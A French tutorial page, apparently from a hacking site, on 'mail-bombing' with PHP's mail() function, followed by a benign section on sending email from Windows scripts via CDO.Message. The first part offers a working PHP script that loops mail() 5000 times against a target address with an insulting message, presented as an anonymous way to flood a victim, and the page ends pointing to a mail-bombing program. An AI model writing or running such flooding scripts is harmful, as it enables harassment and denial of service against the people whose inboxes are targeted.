- Accueil »
- Mail Bombing »
- Mail-bombing
Mail-bombing
La fonction mail() de PHP permet l'envoi de mails de façon simple via un script.
Cette fonction n'est pas proprement dit une faille, mais il est possible de l'employer pour des envois massifs de spams, faire du mail-bombing.
Le principe est très simple, le hackeur pensera que s'il envoi des spams depuis un script PHP hébergé sur son hébergeur, c'est l'IP de ce dernier qui apparaitra dans les headers des courriers. Ce qui est par ailleurs exact.
Voici un exemple de script destiné à mail-bomber :
- CODE:
<?php
$to = "cible@victime.net";
$subject = "Spammer by me !";
$message = "tien prend ça dans la tronche";
for($i=0; $i<5000; $i++) {
mail($to, $subject, $message);
}
?>
Ce script exécutant la fonction mail() à l'aide d'une boucle for, l'e-mail $to recevra 5000 messages et cela en toute anonymat. Ce qui permet à cerains de comprendre pourquoi cette fonction si utile est bien souvent désactivée pour les hébergeurs gratuit, acceptant le PHP bien sûr !
scripts sous Windows
Pour envoyer un mail, la collection d'objets à connaître est CDO, en particulier l'objet
CDO.Message
.var msg = new ActiveXObject("CDO.Message");
msg.From = "Moi <me@mycomputer.invalid>";
msg.To = "Dave <devnull@ens.fr>";
msg.Subject = "Essai avec CDO.Message";
msg.TextBody = "J'essaie mon nouveau script.\n";
msg.Send();
Pour envoyer le mail, CDO essaie par défaut d'utiliser le serveur SMTP inclus dans IIS, quand il est installé (par exemple pour un Windows XP Pro), ou les paramètres d'Outlook Express. S'il n'arrive pas à trouver les informations requises, l'envoi échoue. Dans ce cas, il faut indiquer explicitement un serveur SMTP ou un répertoire de messages en attente d'envoi. Voici comment indiquer explicitement un serveur SMTP dans l'exemple précédent.
var cfg = new ActiveXObject("CDO.Configuration");
var flds = cfg.Fields;
flds("http://schemas.microsoft.com/cdo/configuration/sendusing")
= 2;
flds("http://schemas.microsoft.com/cdo/configuration/smtpserver")
= "nef.ens.fr";
flds.Update();
var msg = new ActiveXObject("CDO.Message");
msg.Configuration = cfg;
msg.From = "Moi <me@mycomputer.invalid>";
msg.To = "Dave <devnull@ens.fr>";
msg.Subject = "Essai avec CDO.Message";
msg.TextBody = "J'essaie mon nouveau script.\n";
msg.Send();
Lien programme mailbombing